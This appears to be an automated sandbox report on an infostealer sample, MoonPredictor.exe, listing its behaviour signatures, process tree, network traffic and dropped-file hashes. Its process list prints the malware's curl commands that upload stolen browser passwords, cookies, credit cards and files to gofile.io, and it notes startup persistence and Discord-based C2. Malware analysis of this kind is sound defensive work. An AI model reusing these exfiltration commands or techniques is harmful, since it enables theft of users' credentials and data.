Analysis Overview
SHA256
6fa636aaa6c81a0fc336a2e08dfbdd2d31c54da9a1dd44328f8c997c919644cc
Threat Level: Shows suspicious behavior
The file MoonPredictor.exe was found to be: Shows suspicious behavior.
Malicious Activity Summary
Reads user/profile data of web browsers
Loads dropped DLL
Drops startup file
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Detects Pyinstaller
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Modifies registry class
Suspicious use of WriteProcessMemory
Checks processor information in registry
Enumerates processes with tasklist
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 13:57
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 13:57
Reported
2024-05-29 13:58
Platform
win10-20240404-en
Max time kernel
18s
Max time network
20s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoonPredictor.exe | C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"
C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe
"C:\Users\Admin\AppData\Local\Temp\MoonPredictor.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.0.906147803\1893837670" -parentBuildID 20221007134813 -prefsHandle 1728 -prefMapHandle 1720 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6f4a56e-7f05-494e-bf07-1cc008ff0584} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 1808 23262418e58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.1.457057340\966823217" -parentBuildID 20221007134813 -prefsHandle 2152 -prefMapHandle 2148 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463e25bb-f02d-4077-b7a0-b4f87e8e6324} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2164 232611f9558 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.2.419601715\1102580640" -childID 1 -isForBrowser -prefsHandle 2744 -prefMapHandle 2672 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b71937f-63e3-4b1e-8e28-7f07aa756660} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 2980 232652f6058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.3.1582382032\611746898" -childID 2 -isForBrowser -prefsHandle 3252 -prefMapHandle 3240 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e324d50-9887-402a-a8af-32ea75c06e19} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 3488 23263c46958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.4.2075582435\119602772" -childID 3 -isForBrowser -prefsHandle 4152 -prefMapHandle 4148 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0891d646-24ee-45ff-b2c8-721f08daf540} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4164 23266a43058 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store1.gofile.io/uploadFile"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.5.1460825049\1895753631" -childID 4 -isForBrowser -prefsHandle 4772 -prefMapHandle 4764 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7310d7e7-b208-4d54-94c8-8fb007babae8} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4800 232675fbc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.6.1703885957\1381724603" -childID 5 -isForBrowser -prefsHandle 4932 -prefMapHandle 4936 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2bcd844-d8cf-430a-b0da-a769fc9a7a7c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4924 232675fbf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.7.1066197513\73023151" -childID 6 -isForBrowser -prefsHandle 4800 -prefMapHandle 4704 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f731f79-c6c7-47c6-ab1f-abecd794a564} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5108 23268249858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.8.726074387\271029873" -childID 7 -isForBrowser -prefsHandle 5628 -prefMapHandle 4632 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0afa0caf-b2df-49c2-9cdc-5e0f9687892c} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5680 23267283c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.9.2104782825\18777930" -parentBuildID 20221007134813 -prefsHandle 5820 -prefMapHandle 5804 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b8583cf-5b53-40ee-8fd5-aae620ff6034} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 5688 232690bc258 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.10.477575502\1755831304" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5992 -prefMapHandle 5988 -prefsLen 26328 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07070499-f44f-4f3e-b13d-82563c2a72cf} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6004 23269031558 utility
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupReceive.ttc" https://store1.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupUnregister.clr" https://store1.gofile.io/uploadFile"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.11.671860188\408956740" -childID 8 -isForBrowser -prefsHandle 5368 -prefMapHandle 5288 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {52f650e6-a64d-4529-8ad2-f5d87f8af2c3} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4732 23265263258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.12.1880285698\1255029390" -childID 9 -isForBrowser -prefsHandle 2856 -prefMapHandle 2852 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00bf6b26-94a8-4cfb-89f1-5eeb35e66db1} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 4868 2326731a358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3732.13.824097604\555468084" -childID 10 -isForBrowser -prefsHandle 5156 -prefMapHandle 4732 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1096 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {027e6729-4eb2-45e9-9f92-842e92b00422} 3732 "\\.\pipe\gecko-crash-server-pipe.3732" 6548 2326759f558 tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| N/A | 127.0.0.1:49921 | tcp | |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 44.237.98.207:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 44.237.65.238:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 127.0.0.1:49929 | tcp | |
| US | 8.8.8.8:53 | 238.65.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| FI | 173.194.220.94:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| FI | 173.194.220.94:443 | id.google.com | udp |
| FR | 172.217.18.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| FR | 172.217.18.214:443 | i.ytimg.com | tcp |
| FR | 172.217.18.214:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 214.18.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.220.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 216.58.201.110:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| US | 8.8.8.8:53 | youtube-ui.l.google.com | udp |
| GB | 216.58.201.110:443 | youtube-ui.l.google.com | udp |
| GB | 216.58.201.110:443 | youtube-ui.l.google.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| GB | 216.58.201.110:443 | youtube-ui.l.google.com | udp |
| FR | 172.217.18.214:443 | i.ytimg.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 172.217.18.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| FR | 172.217.18.214:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | rr1---sn-aigzrnld.googlevideo.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| GB | 74.125.97.70:443 | rr1---sn-aigzrnld.googlevideo.com | tcp |
| GB | 74.125.97.70:443 | rr1---sn-aigzrnld.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr1.sn-aigzrnld.googlevideo.com | udp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | rr1.sn-aigzrnld.googlevideo.com | udp |
| FR | 172.217.20.196:443 | www.google.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 172.217.20.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | rr1---sn-aigzrnld.googlevideo.com | udp |
| US | 8.8.8.8:53 | 70.97.125.74.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI14522\python312.dll
| MD5 | 3c388ce47c0d9117d2a50b3fa5ac981d |
| SHA1 | 038484ff7460d03d1d36c23f0de4874cbaea2c48 |
| SHA256 | c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb |
| SHA512 | e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35 |
C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI14522\base_library.zip
| MD5 | 8dad91add129dca41dd17a332a64d593 |
| SHA1 | 70a4ec5a17ed63caf2407bd76dc116aca7765c0d |
| SHA256 | 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783 |
| SHA512 | 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50 |
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_ctypes.pyd
| MD5 | bbd5533fc875a4a075097a7c6aba865e |
| SHA1 | ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00 |
| SHA256 | be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570 |
| SHA512 | 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e |
C:\Users\Admin\AppData\Local\Temp\_MEI14522\python3.DLL
| MD5 | 79b02450d6ca4852165036c8d4eaed1f |
| SHA1 | ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4 |
| SHA256 | d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123 |
| SHA512 | 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416 |
\Users\Admin\AppData\Local\Temp\_MEI14522\libffi-8.dll
| MD5 | 0f8e4992ca92baaf54cc0b43aaccce21 |
| SHA1 | c7300975df267b1d6adcbac0ac93fd7b1ab49bd2 |
| SHA256 | eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a |
| SHA512 | 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978 |
C:\Users\Admin\AppData\Local\Temp\_MEI14522\_lzma.pyd
| MD5 | 05e8b2c429aff98b3ae6adc842fb56a3 |
| SHA1 | 834ddbced68db4fe17c283ab63b2faa2e4163824 |
| SHA256 | a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c |
| SHA512 | badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3 |
C:\Users\Admin\AppData\Local\Temp\_MEI14522\VCRUNTIME140_1.dll
| MD5 | f8dfa78045620cf8a732e67d1b1eb53d |
| SHA1 | ff9a604d8c99405bfdbbf4295825d3fcbc792704 |
| SHA256 | a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5 |
| SHA512 | ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371 |
\Users\Admin\AppData\Local\Temp\_MEI14522\select.pyd
| MD5 | 92b440ca45447ec33e884752e4c65b07 |
| SHA1 | 5477e21bb511cc33c988140521a4f8c11a427bcc |
| SHA256 | 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3 |
| SHA512 | 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191 |
\Users\Admin\AppData\Local\Temp\_MEI14522\_hashlib.pyd
| MD5 | eedb6d834d96a3dffffb1f65b5f7e5be |
| SHA1 | ed6735cfdd0d1ec21c7568a9923eb377e54b308d |
| SHA256 | 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2 |
| SHA512 | 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad |
\Users\Admin\AppData\Local\Temp\_MEI14522\_queue.pyd
| MD5 | 6e0cb85dc94e351474d7625f63e49b22 |
| SHA1 | 66737402f76862eb2278e822b94e0d12dcb063c5 |
| SHA256 | 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b |
| SHA512 | 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a |
\Users\Admin\AppData\Local\Temp\_MEI14522\libssl-3.dll
| MD5 | 19a2aba25456181d5fb572d88ac0e73e |
| SHA1 | 656ca8cdfc9c3a6379536e2027e93408851483db |
| SHA256 | 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006 |
| SHA512 | df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337 |
\Users\Admin\AppData\Local\Temp\_MEI14522\_ssl.pyd
| MD5 | 5b9b3f978d07e5a9d701f832463fc29d |
| SHA1 | 0fcd7342772ad0797c9cb891bf17e6a10c2b155b |
| SHA256 | d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa |
| SHA512 | e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405 |
\Users\Admin\AppData\Local\Temp\_MEI14522\libcrypto-3.dll
| MD5 | e547cf6d296a88f5b1c352c116df7c0c |
| SHA1 | cafa14e0367f7c13ad140fd556f10f320a039783 |
